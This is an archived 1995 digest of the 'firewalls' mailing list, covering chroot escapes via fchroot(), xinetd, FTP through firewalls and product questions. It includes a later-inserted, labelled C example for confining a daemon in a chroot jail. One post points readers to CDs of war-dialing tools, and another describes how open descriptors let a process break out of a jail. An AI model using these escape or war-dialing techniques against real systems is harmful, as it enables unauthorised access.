Message-Id: <199505042010.NAA08110@miles.greatcircle.com>
Received: from RALVM17 by VNET.IBM.COM (IBM VM SMTP V2R3) with BSMTP id 3186; Thu, 04 May 95 16:10:45 EDT
Date: Thu, 4 May 95 16:09:53 EDT
To: firewalls@greatcircle.com
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

uns firewalls

From firewalls-owner Thu May 4 13:55:27 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA07799 for firewalls-outgoing; Thu, 4 May 1995 12:58:05 -0700
Received: from relay1.UU.NET (relay1.UU.NET [192.48.96.5]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id MAA07794 for ; Thu, 4 May 1995 12:58:02 -0700
Received: from relay.tis.com by relay1.UU.NET with SMTP id QQyohr16017; Thu, 4 May 1995 15:58:09 -0400
Received: from sol.tis.com(192.33.112.100) by relay.tis.com via smap (g3.0) id sma016039; Thu, 4 May 95 15:56:06 -0400
Received: from (illuminati.tis.com) by tis.com (4.1/SUN-5.64) id AA13423; Thu, 4 May 95 15:56:47 EDT
Received: by (4.1/illuminati) id AA04203; Thu, 4 May 95 16:03:55 EDT
From: "Marcus J. Ranum"
Message-Id: <4203.9505042003@illuminati>
Subject: Re: Firewall failure modes (was Re: performance)
To: mcr@milkyway.com (Michael Richardson)
Date: Thu, 4 May 1995 16:03:54 -0400 (EDT)
Cc: firewalls@greatcircle.com
In-Reply-To: <199505041733.NAA00603@metis.milkyway.com> from "Michael Richardson" at May 4, 95 01:33:56 pm
Organization: Trusted Information Systems, Inc. Glenwood, MD
Phone: 301-854-6889
Coredump: Infocalypse Now!!!
Content-Type: text
Content-Length: 538
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> I have examined the code a bit. I hadn't noticed fchroot() existed
> on SunOS until about a month ago. It says that it only guarantees that
> it will chroot(2) back to the real root.

fchroot() is nasty and arguably if you have a socket open to someplace in
the real root filesystem you could get OUT of a chrooted area. Periodically
I have considered cross-wiring the fchroot() entry in the system call table
to call panic(), so that if someone does something that actually manages to
invoke an fchroot() I'll know about it. :)

mjr.
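Ranum's point is that a descriptor left open on something outside the jail (a directory or a socket on the real root filesystem) is what gives a confined process a way back out, fchroot() being one route. The defensive sequence a proxy or gateway daemon should follow when it confines itself is therefore: resolve what it needs from the outside first, close every descriptor it does not need, chdir() and chroot() into the jail, chdir("/") again, and then give up root, since both chroot() and fchroot() require privilege. The following is an added example written for this discussion, not code from the TIS fwtk or from any list member; the jail path and account in main() are assumed placeholders, and open_fds_above(), close_from(), stray_fd_check() and enter_jail() are helpers defined here.

```c
/* Added illustration (not fwtk or any list member's code): confine a
 * proxy-style daemon to a chroot jail without leaving it a handle on
 * the outside, which is the opening Ranum's note is about. */
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <grp.h>
#include <pwd.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

/* Upper bound for descriptor scans. */
static int max_fd(void)
{
    long n = sysconf(_SC_OPEN_MAX);
    return (n > 0 && n < 65536) ? (int)n : 1024;
}

/* Number of descriptors >= lowfd that are open right now.  Just before
 * chroot() this should be 0 for lowfd == 3: every survivor is a reference
 * into the real filesystem, or a socket, that the jail cannot take away. */
int open_fds_above(int lowfd)
{
    int fd, count = 0, limit = max_fd();
    for (fd = lowfd; fd < limit; fd++)
        if (fcntl(fd, F_GETFD) != -1)
            count++;
    return count;
}

/* Close every descriptor >= lowfd; returns how many were open. */
int close_from(int lowfd)
{
    int fd, closed = 0, limit = max_fd();
    for (fd = lowfd; fd < limit; fd++)
        if (close(fd) == 0)
            closed++;
    return closed;
}

/* Self-check that needs no root: create a stray descriptor, then show
 * that close_from() removes it.  Returns 0 on success, -1 otherwise. */
int stray_fd_check(void)
{
    int fd = open("/dev/null", O_RDONLY);
    if (fd < 0)
        return -1;
    int before = open_fds_above(3);            /* counts at least the new fd */
    int closed = close_from(3);
    int gone = (fcntl(fd, F_GETFD) == -1 && errno == EBADF);
    return (before >= 1 && closed >= 1 && gone) ? 0 : -1;
}

/* Enter `dir` and become `user`.  Order matters: resolve the account while
 * /etc/passwd is still visible, close stray descriptors, chdir, chroot,
 * chdir("/") so the cwd is inside the new root, then give up root so that
 * neither chroot() nor fchroot() can be called again.  Returns 0 on
 * success, -1 with errno set.  Needs root to get past chroot(); the user
 * lookup and the refusal to run as uid 0 do not. */
int enter_jail(const char *dir, const char *user)
{
    struct passwd *pw = getpwnam(user);
    if (pw == NULL) { errno = ENOENT; return -1; }
    if (pw->pw_uid == 0) { errno = EPERM; return -1; }  /* never stay root inside */

    close_from(3);
    if (chdir(dir) != 0 || chroot(dir) != 0 || chdir("/") != 0)
        return -1;
    if (setgroups(0, NULL) != 0 || setgid(pw->pw_gid) != 0 || setuid(pw->pw_uid) != 0)
        return -1;
    /* Confirm the drop stuck; a silent failure would leave chroot() usable. */
    if (setuid(0) == 0 || getuid() != pw->pw_uid) { errno = EPERM; return -1; }
    return 0;
}

int main(int argc, char **argv)
{
    /* Assumed placeholder jail and account; pass real ones on the command line. */
    const char *dir  = argc > 1 ? argv[1] : "/var/jail/example";
    const char *user = argc > 2 ? argv[2] : "nobody";
    if (enter_jail(dir, user) != 0) {
        perror("enter_jail");
        return 1;
    }
    printf("confined to %s as %s, %d descriptors open above stderr\n",
           dir, user, open_fds_above(3));
    return 0;
}
```

Run it as root with a real jail directory and an unprivileged account; stray_fd_check() is the part that can be exercised without privilege. The getpwnam() call before chroot() and the verification that setuid() cannot be undone are the two steps most often left out, and either omission leaves the process with more than the jail was meant to allow.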
From firewalls-owner Thu May 4 14:24:06 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA06236 for firewalls-outgoing; Thu, 4 May 1995 11:32:44 -0700
Received: from gw0.telebase.com (gw0.telebase.com [192.132.57.100]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id LAA06225 for ; Thu, 4 May 1995 11:32:41 -0700
Received: from gw1.telebase.com by gw0.telebase.com id OAA04604 for ; Thu, 4 May 1995 14:37:21 -0400
From: Chuck Murcko
Message-Id: <199505041836.OAA15618@telebase.com>
Subject: Life, and xinetd
To: Firewalls@GreatCircle.COM
Date: Thu, 4 May 1995 14:36:46 -0400 (EDT)
In-Reply-To: <199505040800.BAA25512@miles.greatcircle.com> from "firewalls-digest-owner@GreatCircle.COM" at May 4, 95 01:00:11 am
X-Mailer: ELM [version 2.4 PL23]
Content-Type: text
Content-Length: 1328
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

fc@all.net (Dr. Frederick B. Cohen) liltingly intones:
>
> ...edited...
>
> Please feel free to flame away.
>

Brent, maybe it's time to start the Firewalls-Flamage mailing list, what with
all the testing, source code, Pentagon security, Dan Farmer, and other
gratuitous and bandwidth-wasting info flows and NSHOs. I've gotten a lot of
extremely useful information from this list; however, not much of that has
been happening lately. Maybe it's time for us all to settle back to the
issues at hand; namely, firewalls and their design, construction and
maintenance.

On another note, I have ported xinetd.2.1.4 to BSDI and Linux. It should be
possible to build it for FreeBSD and NetBSD also. I won't waste time and
bandwidth running the README out to all, as you can find it at ftp.bsdi.edu
and sunsite.unc.edu in those sites' incoming directories as
xinetd.2.1.4-bsdi.1.tar.gz and xinetd.2.1.4-linux.1.tar.gz, respectively.
Suffice it to say that xinetd is a beefed-up inetd with access control,
logging, etc. etc., originally written for SunOS 4.x and Ultrix 4.x by
Panagiotis Tsirigotis.

Thanks for your patience, Brent.

chuck
Chuck Murcko    Telebase Systems, Inc.    Wayne PA    chuck@telebase.com
And now, on a lighter note:
I tried to think of some self- and company-promoting advertising to put here,
but I couldn't.

From firewalls-owner Thu May 4 14:41:03 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA07778 for firewalls-outgoing; Thu, 4 May 1995 12:57:28 -0700
Received: from gmlink2.gmeds.com (gmlink2.gmeds.com [192.85.154.67]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id MAA07773 for ; Thu, 4 May 1995 12:57:21 -0700
Received: from wtc.nec.gmeds.com (necns.wtc.nec.gmeds.com) by gmlink2.gmeds.com with SMTP id AA12251 (InterLock SMTP Gateway 3.0 for ); Thu, 4 May 1995 15:55:46 -0400
Received: from glock.wtc.nmc.gmeds.com by wtc.nec.gmeds.com (4.1/EDS-1.0) id AA17787; Thu, 4 May 95 15:55:25 EDT
Received: by glock.wtc.nmc.gmeds.com (5.x/SMI-SVR4) id AA19669; Thu, 4 May 1995 15:51:49 -0400
From: atkinsr@glock.wtc.nec.gmeds.com (Rusty Atkins L.)
Message-Id: <9505041951.AA19669@glock.wtc.nmc.gmeds.com>
Subject: looking for war diallers (fwd)
To: firewalls@greatcircle.com (firewalls)
Date: Thu, 4 May 1995 15:51:48 -0400 (EDT)
Reply-To: atkinsr@glock.wtc.nmc.gmeds.com
X-Mailer: ELM [version 2.4 PL23]
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Forwarded message:
>
> "atkinsr" == Rusty Atkins L. writes:
>
> atkinsr> Get the "Hacker Chronicles" CD(s), there are dozens of them
> atkinsr> there.
>
> I'll bite, where do I order them?
>

They are at computer shows all over the place. Tiger software now carries
them. I haven't seen the second disk yet. The first disc is the one I have,
and it has lots of dialers, numbers for strange BBS's, etc. I think the
discs run about $25 apiece.

--
----------------------------------------------------------------------------
* Rusty Atkins                            This           EDS/ATSS          *
* email: atkinsr@glock.wtc.nmc.gmeds.com  space          Mfg B, MD-44      *
* Phone: (810) 947-0220                   intentionally  30300 Mound       *
* Pager: (810) 316-3392                   left           Warren, MI.       *
* Fax:   (810) 947-0652                   blank          48090             *
----------------------------------------------------------------------------

From firewalls-owner Thu May 4 15:17:54 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA10334 for firewalls-outgoing; Thu, 4 May 1995 14:20:17 -0700
Received: from usasmtp.usagroup.org ([198.70.128.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id OAA10329 for ; Thu, 4 May 1995 14:20:12 -0700
Received: from DOMAIN-E-Message_Server by usasmtp.usagroup.org with Novell_GroupWise; Thu, 04 May 1995 16:24:21 -0600
Message-Id:
X-Mailer: Novell GroupWise 4.1
Date: Thu, 04 May 1995 16:20:32 -0600
From: David Leonard
To: firewalls@greatcircle.com
Subject: Firewall-1 Pros and Cons
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I am looking for companies that have selected Firewall-1 as their firewall
product. I am interested in why you chose this product over the other
products, such as Sidewinder, Gauntlet, Janus, and Raptor. If you can
explain the pros and cons of your decision I would appreciate it. If you are
available to discuss your decision I will gladly give you a call.

Thank you.
david

From firewalls-owner Thu May 4 17:09:12 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA26734 for firewalls-outgoing; Thu, 4 May 1995 17:01:41 -0700
Received: from explorer (explorer.ho.BoM.GOV.AU [134.178.8.120]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id RAA26724 for ; Thu, 4 May 1995 17:01:22 -0700
Message-Id: <199505050001.RAA26724@miles.greatcircle.com>
Received: from BoM.GOV.AU (localhost) by explorer with ESMTP (1.37.109.15/16.2) id AA111502091; Fri, 5 May 1995 00:01:32 GMT
X-Mailer: exmh version 1.6 4/21/95
To: firewalls@greatcircle.com
From: richard.jones@BoM.GOV.AU (Richard Jones)
Reply-To: richard.jones@BoM.GOV.AU
Subject: Ganutlet on IRIX?
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Fri, 05 May 1995 00:01:31 GMT
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I have heard a rumour, and would like it clarified. Has Gauntlet been made
available on Silicon Graphics workstations? Are there any plans to do so?

Thanks,
Richard.

Richard Jones, Supercomputing Section at the Bureau of Meteorology, Australia.
richard.jones@BoM.GOV.AU, MIME accepted.
Work phone: +61-3-669-4539

From firewalls-owner Thu May 4 17:39:26 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA24965 for firewalls-outgoing; Thu, 4 May 1995 16:43:36 -0700
Received: from teal.csn.org (teal.csn.net [199.117.27.22]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id QAA24940 for ; Thu, 4 May 1995 16:43:28 -0700
Received: by teal.csn.org id AA24098 (5.65c/IDA-1.5 for firewalls@greatcircle.com); Thu, 4 May 1995 17:43:43 -0600
Date: Thu, 4 May 1995 17:43:43 -0600
From: Scott Surguine
Message-Id: <199505042343.AA24098@teal.csn.org>
To: firewalls@greatcircle.com
Subject: FTP Accross firewall
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Greetings Folks,

I must confess to being a bit of a newbie here: I am trying to figure out
the best method (conceptually) for FTP across a Firewall. I have read both
the FAQ, and the explanation in Bellovin/Cheswick and still don't quite
follow this piece of the puzzle.

Question: what is a good method that DOES NOT entail having to alter
source code???? I believe that to utilize the PASV alternative, you do
require the source. What other options are there, and what is your personal
preference?

Your help/ideas are greatly appreciated,

Scott A. Surguine

From firewalls-owner Thu May 4 18:07:09 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA26814 for firewalls-outgoing; Thu, 4 May 1995 17:10:35 -0700
Received: from tserver.dsac.dla.mil (tserver.dsac.dla.mil [131.78.6.153]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id RAA26809 for ; Thu, 4 May 1995 17:10:30 -0700
Received: by tserver.dsac.dla.mil (5.65/1.35) id AA29499; Thu, 4 May 95 20:08:59 -0400
From: nto2584@tserver.dsac.dla.mil (Steven Payne)
Message-Id: <9505050008.AA29499@tserver.dsac.dla.mil>
Subject: kerberized rlogin for bsd/os
To: firewalls@greatcircle.com
Date: Thu, 4 May 1995 20:08:58 -0400 (EDT)
X-Mailer: ELM [version 2.4 PL21]
Content-Type: text
Content-Length: 833
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

hi,

I am presently installing/testing a firewall based on the tis fwtk and
running on a 486 under bsd/os. My problem is I do not have the kerberized
rlogin working properly. We modified the port from 513 to 543 and recompiled
rlogin-gw. It isn't quite working yet, so I thought I would pose the question
to the net and see if it's already been done. We suspect that the negotiation
of rlogin (kerberized client to the rlogind -k server) may be a cause of the
problem. Anyone have any ideas, or better yet a completed kerberized
rlogin-gw? Any help would be appreciated. If we have to write the kerberized
rlogin-gw, sources may be possible to be obtained. Is there any interest or
any ideas on this subject?
thanks

steve payne
DLA Systems Design Center
Office of Technology Infusion
614-692-9991
home page www.dsac.dla.mil

From firewalls-owner Thu May 4 18:18:08 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA27482 for firewalls-outgoing; Thu, 4 May 1995 17:49:25 -0700
Received: from hobbes.ins.com (hobbes.ins.com [199.0.193.44]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id RAA27471 for ; Thu, 4 May 1995 17:49:15 -0700
Received: (from daemon@localhost) by hobbes.ins.com (8.6.12/8.6.12) id RAA00455; Thu, 4 May 1995 17:12:59 -0700
Received: from uni.ins.com (uni.ins.com [199.0.193.10]) by hobbes.ins.com (8.6.12/8.6.12) with ESMTP id RAA00446 for ; Thu, 4 May 1995 17:10:43 -0700
Received: from relay4.UU.NET (relay4.UU.NET [192.48.96.14]) by uni.ins.com (8.6.10/8.6.10) with ESMTP id IAA14478 for ; Wed, 3 May 1995 08:15:24 -0700
Received: from miles.greatcircle.com by relay4.UU.NET with ESMTP id QQyodg26714; Wed, 3 May 1995 11:14:35 -0400
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA24105 for firewalls-outgoing; Wed, 3 May 1995 05:43:15 -0700
Received: from uu10.psi.com (uu10.psi.com [38.8.4.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id FAA24100 for ; Wed, 3 May 1995 05:43:11 -0700
Received: from po.gis.prc.com by uu10.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP; id AA00503 for Firewalls@greatcircle.com; Wed, 3 May 95 08:43:29 -0400
Message-Id:
Date: 3 May 1995 08:41:29 -0500
From: "Heiser Jay"
Subject: Proxy vs filtering: Where's the beef?
To: Firewalls@greatcircle.com
X-Mailer: Mail*Link SMTP/MS 3.0.0
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Every single firewall digest includes the ongoing religious argument about
filtering routers vs. proxy servers. Where's the evidence that either is less
secure than the other? Around & around we go with "My firewall's better than
your firewall!" (set to music, if you're old enough to remember 60's TV
commercials ;-) but I don't see any evidence beyond vague theoretical
arguments.

Which firewalls are breaking right now? What products and technologies are
not making it? What is being successfully hacked right now as we read this?

From firewalls-owner Thu May 4 18:39:15 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA27347 for firewalls-outgoing; Thu, 4 May 1995 17:43:38 -0700
Received: from sgi.sgi.com (SGI.COM [192.48.153.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id RAA27342 for ; Thu, 4 May 1995 17:43:35 -0700
Received: from sgihub.corp.sgi.com by sgi.sgi.com via ESMTP (950405.SGI.8.6.12/910110.SGI) id RAA12143; Thu, 4 May 1995 17:43:59 -0700
Received: from rock.csd.sgi.com by sgihub.corp.sgi.com via ESMTP (950413.SGI.8.6.12/911001.SGI) id RAA11246; Thu, 4 May 1995 17:43:57 -0700
Received: from boytoy.csd.sgi.com by rock.csd.sgi.com via ESMTP (940816.SGI.8.6.9/940406.SGI.AUTO) id RAA09485; Thu, 4 May 1995 17:43:43 -0700
Received: by boytoy.csd.sgi.com (950215.SGI.8.6.10/911001.SGI) id RAA09556; Thu, 4 May 1995 17:43:42 -0700
From: "Michael/Miguel Sanchez"
Message-Id: <9505041743.ZM9554@boytoy.csd.sgi.com>
Date: Thu, 4 May 1995 17:43:42 -0700
In-Reply-To: richard.jones@BoM.GOV.AU (Richard Jones) "Ganutlet on IRIX?" (May 5, 12:01am)
References: <199505050001.RAA26724@miles.greatcircle.com>
X-Mailer: Z-Mail-SGI (3.2S.1215 15dec94 MediaMail)
To: firewalls@greatcircle.com, richard.jones@BoM.GOV.AU
Subject: Re: Ganutlet on IRIX?
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On May 5, 12:01am, Richard Jones wrote:
> Subject: Ganutlet on IRIX?
>
> I have heard a rumour, and would like it clarified. Has Gauntlet been made
> available on Silicon Graphics workstations? Are there any plans to do so?
>
> Thanks,
> Richard.

Hello all,

Silicon Graphics announced yesterday to resellers that SGI is in the process
of porting the Gauntlet product to the SGI platform. It should be available
later this year. If you are interested in this product please stay in contact
with your SGI account representative about this product. TIS will not have
any information in regards to the SGI product, whereas your account rep will.

Hope this helps.

Miguel
--
_____________________________________________________________________
Miguel (Michael) J. Sanchez                          miguel@sgi.com
Silicon Graphics                      Customer Services Engineering
"There's always room for jello."                           Cage #64
_____________________________________________________________________

From firewalls-owner Thu May 4 19:09:08 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA28809 for firewalls-outgoing; Thu, 4 May 1995 18:59:03 -0700
Received: from earth.execpc.com (earth.execpc.com [204.29.202.50]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id SAA28803 for ; Thu, 4 May 1995 18:58:59 -0700
Received: from heidegger.execpc.com (heidegger.execpc.com [204.29.203.97]) by earth.execpc.com (8.6.12/8.6.11) with SMTP id UAA02588 for ; Thu, 4 May 1995 20:56:19 -0500
Date: Thu, 4 May 1995 20:56:19 -0500
Message-Id: <199505050156.UAA02588@earth.execpc.com>
X-Sender: knitterb@execpc.com
X-Mailer: Windows Eudora Version 1.4.4
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
To: firewalls@GreatCircle.COM
From: knitterb@sol.net (Brandon Knitter)
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

uns firewalls

BRANDON KNITTER
knitterb@sol.net

From firewalls-owner Thu May 4 19:26:20 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id TAA28961 for firewalls-outgoing; Thu, 4 May 1995 19:03:49 -0700
Received: from hawksbill.sprintmrn.com (hawksbill.sprintmrn.com [199.11.1.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id TAA28956 for ; Thu, 4 May 1995 19:03:46 -0700
Received: by hawksbill.sprintmrn.com (5.65/1.34) id AA22860; Thu, 4 May 95 22:04:06 -0500
From: paul@hawksbill.sprintmrn.com (Paul Ferguson)
Message-Id: <9505050304.AA22860@hawksbill.sprintmrn.com>
Subject: Re: Access control across a large network - firewall or other system?
To: smith@sctc.com (Rick Smith)
Date: Thu, 4 May 1995 22:04:05 -0500 (EST)
Cc: firewalls@greatcircle.com, smith@sctc.com
In-Reply-To: <199505041727.MAA08365@shade.sctc.com> from "Rick Smith" at May 4, 95 12:27:22 pm
X-Mailer: ELM [version 2.4 PL22]
Content-Type: text
Content-Length: 2631
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

>
> Can corporate network management actually dictate a policy and make it
> stick? Once upon a time, MIS departments dictated that all computers
> would be bought through them. Then along came minis and micros.
> Today, almost anyone can implement a LAN by visiting the local PC
> mart. If a system is within a department's budget and it visibly
> contributes to the corporation's success, no policy is going to unplug
> it. If dialins or Web pages make them seriously more successful,
> corporate network management won't be able to do a thing, even if
> it violates policy.
>
> Data security is built (or skewered) on three prongs: mission,
> threats, and countermeasures. The organization of interest has a
> "mission" like "build widgets" and its information resources are
> subject to a variety of threats. As you pile on countermeasures you
> reduce the threats, often at the expense of the organization's primary
> mission. At some point security countermeasures are too expensive
> relative to the level of threat or they too seriously degrade the
> primary mission. In practice, security provides deterrence.
>

I have no disagreement with the latter portion of your point(s), however,
I do have a few comments on the former. My point about centralized network
'management' is still the point I'm trying to get across.

For instance, if a corporation has five subsidiaries located in five
different locations around the world, a centralized network engineering,
design & management function should be in place. This could also be the
activity that accommodates access control to various gateways within the
network to & from resources dispersed throughout. This is really the only
sane way to approach this type of access control. If each subsidiary &
division maintains their own access control at the gateway, it could prove
to be a comedy of errors, rarely effective and somewhat (if not majorly)
inhibitive.

Of course, if each division maintains their own Internet gateway, then this
is another kettle of fish altogether, however the thrust of this discussion
is geared towards access control within private networks and separation of
resources within this environment. This type of policy must be dictated by
Corporate MIS or Corporate Security.

My $.02.

- paul
_______________________________________________________________________________
Paul Ferguson                           US Sprint          tel: 703.689.6828
Managed Network Engineering             internet: paul@hawk.sprintmrn.com
Reston, Virginia USA                    http://www.sprintmrn.com

From firewalls-owner Fri May 5 00:39:09 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id AAA04225 for firewalls-outgoing; Fri, 5 May 1995 00:36:58 -0700
Received: from merlion.singnet.com.sg (merlion.singnet.com.sg [165.21.1.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id AAA04220 for ; Fri, 5 May 1995 00:36:54 -0700
Received: (from lorna@localhost) by merlion.singnet.com.sg (8.6.11/8.6.11) id PAA07721; Fri, 5 May 1995 15:37:03 +0800
Date: Fri, 5 May 1995 15:37:02 +0800 (SST)
From: Lorna Leong
Subject: Re: Message from China
To: ZSJABBOTT@EXPRESS.CCCCD.EDU
cc: firewalls@GreatCircle.COM
In-Reply-To: <01HQ3UXDXHB691VTP7@EXPRESS.CCCCD.EDU>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hi,

> Is the message from China concerning ZHU Ling's sickness a
> valid message?
>
> I received the message via the firewall's listserv.

I think it probably is because I read something about it in the newspapers
before receiving the message over the weekend. Apparently, some doctors are
helping her now. I can't remember the details.

Lorna

(ps. sorry that this has got nothing to do with Firewalls.)

From firewalls-owner Fri May 5 03:09:13 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id DAA06772 for firewalls-outgoing; Fri, 5 May 1995 03:05:15 -0700
Received: from oznet02.ozemail.com.au (oznet02.ozemail.com.au [203.2.192.124]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id DAA06767 for ; Fri, 5 May 1995 03:05:10 -0700
Received: from sldar1p01.ozemail.com.au (sldar1p01.ozemail.com.au [203.7.177.17]) by oznet02.ozemail.com.au (8.6.10/8.6.5) with SMTP id UAA05720 for ; Fri, 5 May 1995 20:05:21 +1000
Message-Id: <199505051005.UAA05720@oznet02.ozemail.com.au>
From: "Andrew Exley"
To: firewalls@greatcircle.com
Date: Fri, 5 May 1995 19:28:14 +0730
Subject:
Reply-to: exleya@ozemail.com.au
X-Confirm-Reading-To: exleya@ozemail.com.au
X-pmrqc: 1
Priority: normal
X-mailer: Pegasus Mail/Windows (v1.22)
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

uns firewalls

From firewalls-owner Fri May 5 04:09:20 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id DAA07231 for firewalls-outgoing; Fri, 5 May 1995 03:44:00 -0700
Received: from cpccux0 (cpccux0.cityu.edu.hk [144.214.5.253]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id DAA07226 for ; Fri, 5 May 1995 03:43:41 -0700
Received: from cpccux1.cpuxsvr1.cphk by cpccux0 (5.0/SMI-SVR4) id AA23283; Fri, 5 May 1995 18:42:24 +0800
Received: by cpccux1.cpuxsvr1.cphk (5.0/SMI-SVR4) id AA13401; Fri, 5 May 1995 18:42:25 +0800
Date: Fri, 5 May 1995 18:42:24 +0800 (HKT)
From: Ivan Kaan <94165200@cpccux0.cityu.edu.hk>
X-Sender: 94165200@cpccux1
To: firewalls@GreatCircle.COM
Message-Id:
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Content-Length: 18
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

uns firewalls

From firewalls-owner Fri May 5 05:09:11 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id EAA07941 for firewalls-outgoing; Fri, 5 May 1995 04:58:06 -0700
Received: from hal.stat.unipd.it (hal.stat.unipd.it [147.162.35.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id EAA07936 for ; Fri, 5 May 1995 04:58:02 -0700
Received: by hal.stat.unipd.it (8.6.11/1.34) id NAA13291; Fri, 5 May 1995 13:57:29 +0200
From: danny@hal.stat.unipd.it (Danilo Selvestrel)
Message-Id: <199505051157.NAA13291@hal.stat.unipd.it>
To: firewalls@GreatCircle.COM
Date: Fri, 5 May 1995 13:57:29 +0200 (MET DST)
X-Mailer: ELM [version 2.4 PL22]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Content-Length: 15
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

uns firewalls

From firewalls-owner Fri May 5 07:09:40 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA08998 for firewalls-outgoing; Fri, 5 May 1995 06:41:35 -0700
Received: from all.net (all.net [204.7.229.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id GAA08987 for ; Fri, 5 May 1995 06:41:31 -0700
From: fc@all.net (Dr. Frederick B. Cohen)
Received: by all.net (4.1/3.2.012693-Management Analytics); id AA07876 for firewalls@greatcircle.com; Fri, 5 May 95 09:37:37 EDT
Message-Id: <9505051337.AA07876@all.net>
Subject: no subject (file transmission)
To: firewalls@greatcircle.com
Date: Fri, 5 May 1995 09:37:37 -0400 (EDT)
X-Mailer: ELM [version 2.4 PL22]
Content-Type: text
Content-Length: 369
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

The American Society for Industrial Security's (ASIS) Security Management
Magazine is now making select articles available on an experimental basis
over World Wide Web. This WWW area is still under development, but you might
want to read a fine article about the problems of erasing electromagnetic
media now on-line in this area. The URL is:

	http://all.net:8080

From firewalls-owner Fri May 5 07:55:14 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA09684 for firewalls-outgoing; Fri, 5 May 1995 07:30:39 -0700
Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id HAA09670 for ; Fri, 5 May 1995 07:30:34 -0700
Message-Id: <199505051430.HAA09670@miles.greatcircle.com>
Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA172504325; Sat, 6 May 1995 00:32:05 +1000
From: Darren Reed
Subject: Re: mirror site(s) for ip_fil2.5.2 ?
To: firewall@virtual.cuc.ab.ca (Firewall mailing list)
Date: Sat, 6 May 1995 00:32:05 +1000 (EST)
Cc: firewalls@GreatCircle.COM
In-Reply-To: <9505031450.AA14789@virtual.cuc.ab.ca> from "Firewall mailing list" at May 3, 95 08:50:19 am
X-Mailer: ELM [version 2.4 PL23]
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Content-Length: 490
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

In some mail from Firewall mailing list, they said:
>
> i am interested in inspecting ip_fil2.5.2, but can never seem to get on to
> the anonymous server at coombs.anu.edu.au. are there mirror sites for
> this package, or failing that, can some kind soul email me aforementioned
> package? wu-ftpd and hp-ux...gotta luv it...anyone know how to stop hanging
> ftpd's ?

